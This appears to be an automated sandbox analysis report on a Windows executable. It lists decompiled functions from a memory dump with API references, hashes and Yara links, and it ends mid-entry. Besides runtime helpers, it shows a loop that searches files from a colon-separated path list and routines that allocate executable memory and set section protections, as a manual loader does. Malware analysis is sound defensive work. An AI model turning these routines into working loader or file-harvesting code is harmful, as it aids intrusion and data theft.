0x0040d153
0x0040d155
0x0040d15d
0x0040d169
0x0040d170
0x0040d176
0x0040d179
0x0040d17f
0x0040d17b
0x0040d17b
0x0040d17b
0x0040d181
0x0040d181
0x0040d170
0x0040d18f
0x0040d1a1
0x0040d1ab
0x0040d1b9

APIs

_strlen.LIBCMT ref: 0040D14E
_strlen.LIBCMT ref: 0040D195

Part of subcall function 00404660: std::_Xinvalid_argument.LIBCPMT ref: 00404674

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: _strlen$Xinvalid_argumentstd::_
String ID:
API String ID: 2351027336-0
Opcode ID: 85630486f2fdf8c3013b7cf4cec01835acb5f28285b8556facd1be76c8b909b6
Instruction ID: ac6d06d4a54729e8c3aad800e11bbd60aafcb5f5c50dc18ac9261db0c6d52311
Opcode Fuzzy Hash: 85630486f2fdf8c3013b7cf4cec01835acb5f28285b8556facd1be76c8b909b6
Instruction Fuzzy Hash: AF21CFB1A00304AFDB20CF59DC40B5AB7F9EB49724F100A3FE815E7381EB79A9048799

Uniqueness

Uniqueness Score: -1.00%

Function 00427E50 Relevance: 3.1, APIs: 2, Instructions: 61
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00427E50(intOrPtr __ecx, CHAR* _a4) {
				CHAR* _t12;
				void* _t13;
				CHAR* _t14;
				void* _t24;
				intOrPtr _t28;

				_t12 = _a4;
				_t28 = __ecx;
				 *((intOrPtr*)(__ecx + 0x7c)) = 0;
				 *((intOrPtr*)(__ecx + 0x84)) = 0;
				 *((char*)(__ecx + 0x80)) = 0;
				 *((intOrPtr*)(__ecx + 0x78)) = 0;
				 *((intOrPtr*)(__ecx + 0x70)) = 0;
				 *((intOrPtr*)(__ecx + 0x90)) = 0;
				 *((intOrPtr*)(__ecx + 0x74)) = 0;
				if(_t12 != 0) {
					_t13 = CreateFileA(_t12, 0x80000000, 1, 0, 3, 0, 0); // executed
					_t24 = _t13;
					if(_t24 != 0xffffffff) {
						_t14 = E00427080(_t28, _t24, 0);
						_a4 = _t14;
						if(_t14 == 0) {
							 *((char*)(_t28 + 0x80)) = 1;
							return 0;
						} else {
							CloseHandle(_t24);
							return _a4;
						}
					} else {
						return 0x200;
					}
				} else {
					return 0x10000;
				}
			}

0x00427e53
0x00427e5a
0x00427e5c
0x00427e5f
0x00427e65
0x00427e6b
0x00427e6e
0x00427e71
0x00427e77
0x00427e7c
0x00427e97
0x00427e9d
0x00427ea2
0x00427eb4
0x00427eb9
0x00427ebe
0x00427ed2
0x00427ede
0x00427ec0
0x00427ec1
0x00427ece
0x00427ece
0x00427ea4
0x00427ead
0x00427ead
0x00427e7f
0x00427e86
0x00427e86

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,00000000,?,00428DB1,?), ref: 00427E97

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 19ec74e8e3fd09569f8ce4b6aebfd2744514a2d10472c62de97a3b26ae967e6d
Instruction ID: 4c0b48f9d1b04f3c1f52227d90f0bf371e93891007fc05815102884a8ca2711b
Opcode Fuzzy Hash: 19ec74e8e3fd09569f8ce4b6aebfd2744514a2d10472c62de97a3b26ae967e6d
Instruction Fuzzy Hash: 6311A1B26046145EE7209E6DB8C4B97FBDCF7A8334F10453FF259C6250C27498808668

Uniqueness

Uniqueness Score: -1.00%

Function 0041F480 Relevance: 3.1, APIs: 2, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0041F480(intOrPtr __ebx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				char _v16;
				signed int _v20;
				intOrPtr _v28;
				char _v48;
				void* _v49;
				intOrPtr _v56;
				struct _SYSTEM_INFO _v92;
				void* __edi;
				void* __esi;
				signed int _t18;
				signed int _t19;
				intOrPtr* _t22;
				intOrPtr _t29;
				void* _t38;
				intOrPtr* _t39;
				intOrPtr _t40;
				intOrPtr* _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t49;

				_t49 = __eflags;
				_t29 = __ebx;
				_push(0xffffffff);
				_push(E0043F498);
				_push( *[fs:0x0]);
				_t18 =  *0x451f00; // 0xc21d6f0a
				_t19 = _t18 ^ _t44;
				_v20 = _t19;
				_push(_t38);
				_push(_t19);
				 *[fs:0x0] =  &_v16;
				_t42 = _a4;
				_v56 = 0;
				GetSystemInfo( &_v92); // executed
				_t37 =  &_v48;
				_t22 = E00423BF0(_t38, _t49,  &_v48, _v92.dwNumberOfProcessors); // executed
				_v8 = 0;
				if( *((intOrPtr*)(_t22 + 0x14)) < 0x10) {
					_t39 = _t22;
				} else {
					_t39 =  *_t22;
				}
				 *((intOrPtr*)(_t42 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t42 + 0x10)) = 0;
				 *_t42 = 0;
				E00404BC0(_t42, _t39, E0042BC70(_t39));
				if(_v28 >= 0x10) {
					_push(_v48);
					E0042A289();
				}
				 *[fs:0x0] = _v16;
				_pop(_t40);
				_pop(_t43);
				return E0042A36A(_t42, _t29, _v20 ^ _t44, _t37, _t40, _t43);
			}

0x0041f480
0x0041f480
0x0041f483
0x0041f485
0x0041f490
0x0041f494
0x0041f499
0x0041f49b
0x0041f49f
0x0041f4a0
0x0041f4a4
0x0041f4aa
0x0041f4b1
0x0041f4b8
0x0041f4c2
0x0041f4c9
0x0041f4d2
0x0041f4d9
0x0041f4df
0x0041f4db
0x0041f4db
0x0041f4db
0x0041f4e1
0x0041f4e8
0x0041f4f0
0x0041f4ff
0x0041f508
0x0041f50d
0x0041f50e
0x0041f513
0x0041f51b
0x0041f523
0x0041f524
0x0041f532

APIs

GetSystemInfo.KERNEL32(C21D6F0A,C21D6F0A,?,00000010), ref: 0041F4B8

Part of subcall function 00423BF0: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00423D5C

_strlen.LIBCMT ref: 0041F4F3

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: InfoIos_base_dtorSystem_strlenstd::ios_base::_
String ID:
API String ID: 4288560477-0
Opcode ID: 74010e96c1c64752dd973cbd7abf1cd6cdefac36c7a151b5f7f52cf46f0d75e9
Instruction ID: debf407b792a25ea82ec6dfa5d33d34061f841fb6db50b0b7398c9949b0b65b7
Opcode Fuzzy Hash: 74010e96c1c64752dd973cbd7abf1cd6cdefac36c7a151b5f7f52cf46f0d75e9
Instruction Fuzzy Hash: 2C11D6B2A00208DFDB10DF98D805BDEB7B8EB45714F00452FE802A7381D778A548C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 00418160 Relevance: 3.1, APIs: 2, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00418160(void* __ecx, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t20;
				intOrPtr _t21;
				intOrPtr _t24;
				void* _t25;
				intOrPtr* _t27;
				intOrPtr _t30;
				void* _t32;
				void* _t34;
				void* _t37;

				_t37 = __eflags;
				_t34 = __ecx;
				 *((intOrPtr*)(__ecx + 0x30)) = 0;
				 *((intOrPtr*)(__ecx + 8)) = 0;
				 *((intOrPtr*)(__ecx + 0x10)) = 0;
				 *((intOrPtr*)(__ecx + 0x14)) = 0x201;
				 *((intOrPtr*)(__ecx + 0x18)) = 6;
				 *((intOrPtr*)(__ecx + 0x1c)) = 0;
				 *((intOrPtr*)(__ecx + 0x20)) = 0;
				 *((intOrPtr*)(__ecx + 0x24)) = 0;
				 *((intOrPtr*)(__ecx + 0x28)) = 0;
				 *((intOrPtr*)(__ecx + 0x2c)) = 0;
				E00418030(__ecx, 0, 0);
				_push(4);
				_t20 = E0042C541(_t32, 0, _t34, _t37);
				_t27 = _t20;
				_t38 = _t27;
				if(_t27 == 0) {
					 *((intOrPtr*)(_t34 + 0x30)) = 0;
					return _t20;
				} else {
					_t21 = E00429D27(_t27, 0, _t34, _t38); // executed
					 *_t27 = _t21;
					_v8 = E00429AE6();
					E00429A1B( &_v12, 0);
					_t30 = _v8;
					_t24 =  *((intOrPtr*)(_t30 + 4));
					if(_t24 < 0xffffffff) {
						 *((intOrPtr*)(_t30 + 4)) = _t24 + 1;
					}
					_t25 = E00429A43( &_v12);
					 *((intOrPtr*)(_t34 + 0x30)) = _t27;
					return _t25;
				}
			}

0x00418160
0x00418168
0x0041816f
0x00418172
0x00418175
0x00418178
0x0041817f
0x00418186
0x00418189
0x0041818c
0x0041818f
0x00418192
0x00418195
0x0041819a
0x0041819c
0x004181a1
0x004181a6
0x004181a8
0x004181e3
0x004181ec
0x004181aa
0x004181aa
0x004181af
0x004181ba
0x004181bd
0x004181c2
0x004181c5
0x004181cb
0x004181ce
0x004181ce
0x004181d4
0x004181da
0x004181e2
0x004181e2

APIs

Part of subcall function 00418030: __CxxThrowException@8.LIBCMT ref: 00418054
Part of subcall function 00418030: std::exception::exception.LIBCMT ref: 00418078
Part of subcall function 00418030: __CxxThrowException@8.LIBCMT ref: 00418093
Part of subcall function 00418030: std::exception::exception.LIBCMT ref: 004180B2
Part of subcall function 00418030: __CxxThrowException@8.LIBCMT ref: 004180CD
Part of subcall function 00418030: std::exception::exception.LIBCMT ref: 004180E7
Part of subcall function 00418030: __CxxThrowException@8.LIBCMT ref: 00418102

Part of subcall function 0042C541: _malloc.LIBCMT ref: 0042C55B

std::locale::_Init.LIBCPMT ref: 004181AA

Part of subcall function 00429D27: __EH_prolog3.LIBCMT ref: 00429D2E
Part of subcall function 00429D27: std::_Lockit::_Lockit.LIBCPMT ref: 00429D44
Part of subcall function 00429D27: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00429D66
Part of subcall function 00429D27: std::locale::_Setgloballocale.LIBCPMT ref: 00429D70
Part of subcall function 00429D27: _Yarn.LIBCPMT ref: 00429D86

std::_Lockit::_Lockit.LIBCPMT ref: 004181BD

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: Exception@8Throw$std::exception::exceptionstd::locale::_$LockitLockit::_std::_$H_prolog3InitLocimpLocimp::_SetgloballocaleYarn_malloc
String ID:
API String ID: 353226162-0
Opcode ID: 03cc01180899446901dafbbb70404377cf3c791a38b66e5cce751531bd0f47f1
Instruction ID: 0404842fd0538787e160af53cf033b8d3236af04ed8d176221876e224f740abe
Opcode Fuzzy Hash: 03cc01180899446901dafbbb70404377cf3c791a38b66e5cce751531bd0f47f1
Instruction Fuzzy Hash: 4A119EB1A007149BC320DF6BE58155AFBF8FF90314B10065FD84A83A51DBB5A9458B95

Uniqueness

Uniqueness Score: -1.00%

Function 0040C320 Relevance: 3.1, APIs: 2, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040C320(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, void* _a20, char* _a24, int _a28, int _a32, intOrPtr _a36, intOrPtr _a40) {
				char _v8;
				char* _t14;
				int _t18;
				intOrPtr _t30;
				intOrPtr _t33;
				void* _t35;
				void* _t36;

				_t14 = E0042CE7D(__ebx, __edx, __edi, _a4, ":",  &_v8);
				_t36 = _t35 + 0xc;
				if(_t14 != 0) {
					_push(__ebx);
					_t18 = _a32;
					_t33 = _a40;
					_push(__edi);
					_t30 = _a36;
					do {
						E0040BC20(_a12, 0x443c1c, _a8, _t14, _a16, _a20, _a24, _a28, _t18, _t30, _t33, 0); // executed
						_t14 = E0042CE7D(_t18, _a8, _t30, 0, ":",  &_v8);
						_t36 = _t36 + 0x3c;
					} while (_t14 != 0);
					return _t14;
				}
				return _t14;
			}

0x0040c331
0x0040c336
0x0040c33b
0x0040c33d
0x0040c33e
0x0040c342
0x0040c345
0x0040c346
0x0040c350
0x0040c373
0x0040c383
0x0040c388
0x0040c38b
0x00000000
0x0040c391
0x0040c395

APIs

_strtok_s.LIBCMT ref: 0040C331

Part of subcall function 0040BC20: wsprintfA.USER32 ref: 0040BC74
Part of subcall function 0040BC20: FindFirstFileA.KERNEL32(?,?), ref: 0040BC8B
Part of subcall function 0040BC20: _memset.LIBCMT ref: 0040BCA7
Part of subcall function 0040BC20: lstrcat.KERNEL32(?,?), ref: 0040BCB7
Part of subcall function 0040BC20: StrCmpCA.SHLWAPI(?,004456B0), ref: 0040BCDF
Part of subcall function 0040BC20: StrCmpCA.SHLWAPI(?,004456AC), ref: 0040BCF9
Part of subcall function 0040BC20: lstrcpy.KERNEL32(?,?), ref: 0040BD2B
Part of subcall function 0040BC20: lstrcat.KERNEL32(?,00443C68), ref: 0040BD3D
Part of subcall function 0040BC20: lstrcat.KERNEL32(?,?), ref: 0040BD51
Part of subcall function 0040BC20: _strlen.LIBCMT ref: 0040BD80

_strtok_s.LIBCMT ref: 0040C383

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: lstrcat$_strtok_s$FileFindFirst_memset_strlenlstrcpywsprintf
String ID:
API String ID: 3367091858-0
Opcode ID: 5f97cfeb7811ce2db56aec038ea3b9bcfc95c7e036337921959ff93915104003
Instruction ID: a755fcd78bb4fccf61f5ff3790d406dafd11e1f92b553fd69df8e92c8c277dfb
Opcode Fuzzy Hash: 5f97cfeb7811ce2db56aec038ea3b9bcfc95c7e036337921959ff93915104003
Instruction Fuzzy Hash: 5F015272600209BBDB14DF45DC82FEF77ACEB99714F104259FE08A3281E674ED1187A4

Uniqueness

Uniqueness Score: -1.00%

Function 004204D0 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 35
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004204D0(char _a4, intOrPtr _a8) {
				intOrPtr _t8;
				char* _t9;
				intOrPtr _t11;
				intOrPtr _t13;

				_t1 =  &_a4; // 0x43eee8
				_t8 =  *_t1;
				_t5 = 0;
				if(_t8 != 0) {
					_t13 = _a8;
					if(_t13 == 0) {
						L8:
						return _t5;
					}
					_t3 = _t13 + 1; // 0x419a32
					_t5 = LocalAlloc(0x40, _t3); // executed
					if(0 == 0 || _t13 == 0) {
						L7:
						goto L8;
					} else {
						_t9 = 0;
						_t11 = _t8;
						do {
							 *_t9 =  *((intOrPtr*)(_t11 + _t9));
							_t9 = _t9 + 1;
							_t13 = _t13 - 1;
						} while (_t13 != 0);
						_t5 = 0;
						goto L7;
					}
				}
				return 0;
			}

0x004204d4
0x004204d4
0x004204d7
0x004204db
0x004204de
0x004204e3
0x0042050e
0x00000000
0x0042050e
0x004204e6
0x004204ec
0x004204f6
0x0042050d
0x00000000
0x004204fc
0x004204fe
0x00420500
0x00420502
0x00420505
0x00420507
0x00420508
0x00420508
0x0042050b
0x00000000
0x0042050b
0x004204f6
0x00420511

APIs

LocalAlloc.KERNEL32(00000040,00419A32,?,00000000,00000000,?,00419A31,0043EEE8,?,C21D6F0A,?,00000000,?,0043EEE8,000000FF), ref: 004204EC

Strings

C, xrefs: 004204D4

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: AllocLocal
String ID: C
API String ID: 3494564517-2515487769
Opcode ID: 395bbf60b6eb156d03d3411944add3b4181f3db53578ab0ae5e8526e2975f9cf
Instruction ID: 5f7196945fcb95c54ca2f358479e225c73573b4f5535f06c47e57c5e9927517a
Opcode Fuzzy Hash: 395bbf60b6eb156d03d3411944add3b4181f3db53578ab0ae5e8526e2975f9cf
Instruction Fuzzy Hash: D1F0EC363006253787128D5DA84066BF7DFEFCDE60795413BDA48DB316D665DC804AF4

Uniqueness

Uniqueness Score: -1.00%

Function 00420650 Relevance: 3.0, APIs: 2, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00420650(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				signed int _v8;
				void* _v1008;
				signed int _t10;
				void* _t14;
				signed int _t28;

				_t10 =  *0x451f00; // 0xc21d6f0a
				_v8 = _t10 ^ _t28;
				E0042A2F0( &_v1008, 0, 0x3e8);
				_t14 =  *0x464840(_a4, 0, 0,  &_v1008); // executed
				_t8 = (0 | _t14 < 0x00000000) - 1; // -1
				return E0042A36A(_t8 &  &_v1008, __ebx, _v8 ^ _t28,  &_v1008, __edi, __esi, 0);
			}

0x00420659
0x00420660
0x00420671
0x0042068a
0x0042069d
0x004206af

APIs

_memset.LIBCMT ref: 00420671
SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 0042068A

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: FolderPath_memset
String ID:
API String ID: 3318179493-0
Opcode ID: c22c64a4807c8307f2b51ab940b47c4761dfcf142be929d5add8ba4f16161592
Instruction ID: 3a80f5093c89d711204e061f01bca441e7b45c919fc1ea1bdb194dd928278279
Opcode Fuzzy Hash: c22c64a4807c8307f2b51ab940b47c4761dfcf142be929d5add8ba4f16161592
Instruction Fuzzy Hash: 78F0E931B10348ABDB10DB60DC96FAE73BCEB44704F4042A9F9059B1C0EAB0AB058A89

Uniqueness

Uniqueness Score: -1.00%

Function 00430E6C Relevance: 3.0, APIs: 2, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00430E6C(int _a4) {

				E00430E41(_a4);
				ExitProcess(_a4);
			}

0x00430e74
0x00430e7d

APIs

___crtCorExitProcess.LIBCMT ref: 00430E74

Part of subcall function 00430E41: GetModuleHandleW.KERNEL32(mscoree.dll,?,00430E79,0042C560,?,00433E9B,000000FF,0000001E,0044D548,0000000C,00433F46,0042C560,0042C560,?,004323D1,0000000D), ref: 00430E4B
Part of subcall function 00430E41: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00430E5B

ExitProcess.KERNEL32 ref: 00430E7D

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: ExitProcess$AddressHandleModuleProc___crt
String ID:
API String ID: 2427264223-0
Opcode ID: c5a3cf34a72c50b03f2d3b20a5649d29692d3451ba7a36ef5e0431c080731778
Instruction ID: 6c81dcbc7b8bf67109346cb3956bd8e8432521117a3107d951a42bb68df3cb77
Opcode Fuzzy Hash: c5a3cf34a72c50b03f2d3b20a5649d29692d3451ba7a36ef5e0431c080731778
Instruction Fuzzy Hash: 54B09B350001087FCF012F17DC0A94D3F15EB41350F104025F50C05031DF719D529584

Uniqueness

Uniqueness Score: -1.00%

Function 00403C60 Relevance: 2.6, APIs: 2, Instructions: 71
memoryCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00403C60(signed int __eax, void* __ecx, void* __esi) {
				signed int _v8;
				void* _t20;
				void* _t25;
				signed int _t29;
				void* _t30;
				void* _t32;
				long _t33;
				intOrPtr _t37;
				signed int* _t40;
				intOrPtr _t43;
				signed int _t46;
				void* _t49;

				_t49 = __esi;
				_t37 =  *((intOrPtr*)(__esi + 0x138));
				_t46 =  ~(__eax & 0x00000002);
				asm("sbb edi, edi");
				_t32 = 0;
				if(0 <  *(__esi + 0x46)) {
					_t40 = _t37 + 0xc;
					_v8 =  *(__esi + 0x46) & 0x0000ffff;
					do {
						_t43 =  *((intOrPtr*)(_t40 - 4));
						if(_t43 != 0) {
							_t29 =  *_t40;
							if(_t29 < _t46) {
								_t46 = _t29;
							}
							_t30 = _t29 + _t43;
							if(_t30 > _t32) {
								_t32 = _t30;
							}
						}
						_t40 =  &(_t40[0xa]);
						_t6 =  &_v8;
						 *_t6 = _v8 - 1;
					} while ( *_t6 != 0);
				}
				_t33 = _t32 - _t46;
				_t20 = VirtualAlloc( *((intOrPtr*)(_t49 + 0x74)) + _t46, _t33, 0x3000, 0x40); // executed
				 *(_t49 + 0x148) = _t20;
				 *((intOrPtr*)(_t49 + 0x144)) =  *((intOrPtr*)(_t49 + 0x74));
				if(_t20 != 0) {
					L12:
					asm("sbb eax, eax");
					return ( ~( *(_t49 + 0x148)) & 0xfffffffd) + 3;
				} else {
					if(( *(_t49 + 0x56) & 0x00000001) == 0) {
						_t25 = VirtualAlloc(0, _t33, 0x3000, 0x40);
						 *(_t49 + 0x148) = _t25;
						 *((intOrPtr*)(_t49 + 0x144)) = _t25 - _t46;
						goto L12;
					} else {
						return 4;
					}
				}
			}

0x00403c60
0x00403c64
0x00403c71
0x00403c73
0x00403c77
0x00403c7d
0x00403c83
0x00403c86
0x00403c90
0x00403c90
0x00403c95
0x00403c97
0x00403c9b
0x00403c9d
0x00403c9d
0x00403c9f
0x00403ca3
0x00403ca5
0x00403ca5
0x00403ca3
0x00403ca7
0x00403caa
0x00403caa
0x00403caa
0x00403c90
0x00403cb9
0x00403cbf
0x00403cc8
0x00403cce
0x00403cd6
0x00403d07
0x00403d0f
0x00403d1c
0x00403cd8
0x00403cdc
0x00403cf3
0x00403cf9
0x00403d01
0x00000000
0x00403cde
0x00403ce8
0x00403ce8
0x00403cdc

APIs

VirtualAlloc.KERNEL32(?,00000000,00003000,00000040), ref: 00403CBF
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 00403CF3

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 2dfe31b8404dcb244ccd61d324bc89c46e8dac2274fa8375329dec19c3bd5eaf
Instruction ID: e31968eac1e2e1b86985341b791ed804100d3ec9ad526e7e396903aa28fc3499
Opcode Fuzzy Hash: 2dfe31b8404dcb244ccd61d324bc89c46e8dac2274fa8375329dec19c3bd5eaf
Instruction Fuzzy Hash: 9221E472344B005BD734CFB9CC85BA7BBEAEBC0719F14453EEA1AD6390D679A940C618

Uniqueness

Uniqueness Score: -1.00%

Function 00404010 Relevance: 1.6, APIs: 1, Instructions: 60
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404010(void* __ecx, void* __edi) {
				long _v8;
				intOrPtr _t14;
				signed int _t16;
				signed int _t18;
				long _t19;
				int _t21;
				void* _t25;
				void* _t34;
				unsigned int* _t37;

				_t34 = __edi;
				_t14 =  *((intOrPtr*)(__edi + 0x138));
				_t25 = 0;
				if(0 >=  *((intOrPtr*)(__edi + 0x46))) {
					L13:
					return 0;
				} else {
					_t37 = _t14 + 0x24;
					do {
						_t16 =  *_t37;
						if((_t16 & 0x00000020) != 0) {
							 *_t37 = _t16 | 0x60000000;
						}
						_t18 =  *_t37 >> 0x1d;
						if(_t18 > 6) {
							L10:
							_t19 = 0x40;
						} else {
							switch( *((intOrPtr*)(_t18 * 4 +  &M004040B0))) {
								case 0:
									goto L11;
								case 1:
									_t19 = 0x10;
									goto L11;
								case 2:
									goto L11;
								case 3:
									goto L11;
								case 4:
									goto L10;
							}
						}
						L11:
						_v8 = _t19;
						_t21 = VirtualProtect( *((intOrPtr*)(_t37 - 0x18)) +  *((intOrPtr*)(_t34 + 0x144)),  *(_t37 - 0x1c), _t19,  &_v8); // executed
						if(_t21 == 0) {
							return 9;
						} else {
							goto L12;
						}
						goto L15;
						L12:
						_t25 = _t25 + 1;
						_t37 =  &(_t37[0xa]);
					} while (_t25 < ( *(_t34 + 0x46) & 0x0000ffff));
					goto L13;
				}
				L15:
			}

0x00404010
0x00404014
0x0040401d
0x00404024
0x0040409b
0x004040a2
0x00404026
0x00404026
0x00404030
0x00404030
0x00404034
0x0040403b
0x0040403b
0x0040403f
0x00404045
0x0040406a
0x0040406a
0x00404047
0x00404047
0x00000000
0x00000000
0x00000000
0x0040404e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00404047
0x0040406f
0x00404073
0x00404085
0x0040408d
0x004040ad
0x00000000
0x00000000
0x00000000
0x00000000
0x0040408f
0x00404093
0x00404094
0x00404097
0x00000000
0x00404030
0x00000000

APIs

VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 00404085

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 8fd606f95c63eb16831cdcb41123f56d028c10870dc0ea5d69ff1ceb45d1278e
Instruction ID: 34a1535497f34a2920aee8fc494c1779e58e661ec872f4219f3b6061e155681d
Opcode Fuzzy Hash: 8fd606f95c63eb16831cdcb41123f56d028c10870dc0ea5d69ff1ceb45d1278e
Instruction Fuzzy Hash: 3411CCB16041159BD764DF5CE8807A6F3D9FB88700F10053BEB49F7281D63AAC91979A

Uniqueness

Uniqueness Score: -1.00%

Function 00433436 Relevance: 1.6, APIs: 1, Instructions: 52
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00433436(signed int _a4, signed int _a8, long _a12) {
				void* _t10;
				long _t11;
				long _t12;
				signed int _t13;
				signed int _t17;
				long _t19;
				long _t24;

				_t17 = _a4;
				if(_t17 == 0) {
					L3:
					_t24 = _t17 * _a8;
					__eflags = _t24;
					if(_t24 == 0) {
						_t24 = _t24 + 1;
						__eflags = _t24;
					}
					goto L5;
					L6:
					_t10 = RtlAllocateHeap( *0x465568, 8, _t24); // executed
					__eflags = 0;
					if(0 == 0) {
						goto L7;
					}
					L14:
					return _t10;
					goto L15;
					L7:
					__eflags =  *0x465570;
					if( *0x465570 == 0) {
						_t19 = _a12;
						__eflags = _t19;
						if(_t19 != 0) {
							 *_t19 = 0xc;
						}
					} else {
						_t11 = E00431367(_t10, _t24);
						__eflags = _t11;
						if(_t11 != 0) {
							L5:
							_t10 = 0;
							__eflags = _t24 - 0xffffffe0;
							if(_t24 > 0xffffffe0) {
								goto L7;
							} else {
								goto L6;
							}
						} else {
							_t12 = _a12;
							__eflags = _t12;
							if(_t12 != 0) {
								 *_t12 = 0xc;
							}
							_t10 = 0;
						}
					}
					goto L14;
				} else {
					_t13 = 0xffffffe0;
					_t27 = _t13 / _t17 - _a8;
					if(_t13 / _t17 >= _a8) {
						goto L3;
					} else {
						 *((intOrPtr*)(E0042FC8F(_t27))) = 0xc;
						return 0;
					}
				}
				L15:
			}

0x0043343b
0x00433440
0x0043345d
0x00433462
0x00433464
0x00433466
0x00433468
0x00433468
0x00433468
0x00000000
0x00433470
0x00433479
0x0043347f
0x00433481
0x00000000
0x00000000
0x004334b5
0x004334b7
0x00000000
0x00433483
0x00433483
0x0043348a
0x004334a8
0x004334ab
0x004334ad
0x004334af
0x004334af
0x0043348c
0x0043348d
0x00433493
0x00433495
0x00433469
0x00433469
0x0043346b
0x0043346e
0x00000000
0x00000000
0x00000000
0x00000000
0x00433497
0x00433497
0x0043349a
0x0043349c
0x0043349e
0x0043349e
0x004334a4
0x004334a4
0x00433495
0x00000000
0x00433442
0x00433446
0x00433449
0x0043344c
0x00000000
0x0043344e
0x00433453
0x0043345c
0x0043345c
0x0043344c
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0042EBC8,0042C560,?,00000000,00000000,00000000,?,00432466,00000001,00000214), ref: 00433479

Part of subcall function 0042FC8F: __getptd_noexit.LIBCMT ref: 0042FC8F

Memory Dump Source

